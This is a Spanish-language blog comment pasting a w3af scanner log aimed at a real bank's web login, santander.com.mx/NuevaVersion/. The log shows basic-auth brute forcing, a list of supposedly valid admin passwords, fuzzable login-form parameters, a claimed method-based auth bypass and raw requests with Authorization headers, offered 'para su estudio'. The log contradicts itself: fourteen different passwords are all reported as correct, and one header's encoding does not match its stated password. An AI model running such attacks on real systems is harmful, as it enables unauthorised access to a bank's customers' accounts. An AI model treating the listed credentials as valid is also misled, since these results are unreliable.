He aqui otra.
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.collectCookies
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.httpAuthDetect
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: grep.error500
[Thu 26 May 2011 10:05:43 PM CDT] Auto-enabling plugin: discovery.serverHeader
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.allowedMethods
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: discovery.frontpage_version
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.passwordProfiling
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.getMails
[Thu 26 May 2011 10:05:44 PM CDT] Auto-enabling plugin: grep.lang
[Thu 26 May 2011 10:05:46 PM CDT] The page language is: es
[Thu 26 May 2011 10:05:46 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:05:47 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication. The realm is: "Basic realm="Sun ONE Web Server"". This information was found in the request with id 53.
[Thu 26 May 2011 10:05:56 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:05:56 PM CDT] Starting basic authentication bruteforce on URL: "http://www.santander.com.mx/NuevaVersion/".
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/dragon. This vulnerability was found in the request with id 102.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/123abc. This vulnerability was found in the request with id 104.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/pa55. This vulnerability was found in the request with id 105.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/admin123. This vulnerability was found in the request with id 107.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/d474b453. This vulnerability was found in the request with id 108.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/73mp123. This vulnerability was found in the request with id 106.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/letmein. This vulnerability was found in the request with id 110.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/nopassword. This vulnerability was found in the request with id 109.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/supervisor. This vulnerability was found in the request with id 111.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/codename. This vulnerability was found in the request with id 112.
[Thu 26 May 2011 10:05:57 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/7emp. This vulnerability was found in the request with id 113.
[Thu 26 May 2011 10:06:00 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.
[Thu 26 May 2011 10:06:00 PM CDT] Starting formAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] http://www.santander.com.mx/NuevaVersion/index.html is a registration form.
[Thu 26 May 2011 10:06:00 PM CDT] Starting basicAuthBrute plugin execution.
[Thu 26 May 2011 10:06:00 PM CDT] Found 2 URLs and 3 different points of injection.
[Thu 26 May 2011 10:06:00 PM CDT] The list of URLs is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:00 PM CDT] The list of fuzzable requests is:
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/ | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: GET
[Thu 26 May 2011 10:06:00 PM CDT] - http://www.santander.com.mx/NuevaVersion/index.html | Method: POST | Parameters: (miURL="/schmexapp...", pag="/schmexapp...", login.claveCliente="", login.NIP="", irAmodulo="1")
[Thu 26 May 2011 10:06:30 PM CDT] Too many retries (2) while requesting: http://www.santander.com.mx/NuevaVersion/index.html
[Thu 26 May 2011 10:06:43 PM CDT] The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
[Thu 26 May 2011 10:07:16 PM CDT] Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
[Thu 26 May 2011 10:07:16 PM CDT] The remote HTTP Server ommited the "server" header in it's response. This information was found in the request with id 48.
[Thu 26 May 2011 10:07:16 PM CDT] The URL "http://www.santander.com.mx/NuevaVersion/" has the following allowed methods: GET, HEAD, POST.
[Thu 26 May 2011 10:07:17 PM CDT] The thread:
basicAuthBrute auth
Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/abcde. This vulnerability was found in the request with id 101.
GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWJjZGU=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qwerty. This vulnerability was found in the request with id 103.
GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
Found authentication credentials to: "http://www.santander.com.mx/NuevaVersion/". A correct user and password combination is: admin/qazwsx. This vulnerability was found in the request with id 114.
GET http://www.santander.com.mx/NuevaVersion/ HTTP/1.1
Authorization: Basic YWRtaW46cWF6d3N4
Host: www.santander.com.mx
Accept-encoding: identity
Accept: */*
User-agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; w3af.sf.net)
htaccessMethods=auth
The resource: "http://www.santander.com.mx/NuevaVersion/" requires authentication but the access is misconfigured and can be bypassed using these methods: GET, POST, HEAD.
Hay se las dejo para su estudio.
Saludos Mundo libre.
Este comentario ha sido eliminado por un administrador del blog.
ResponderEliminar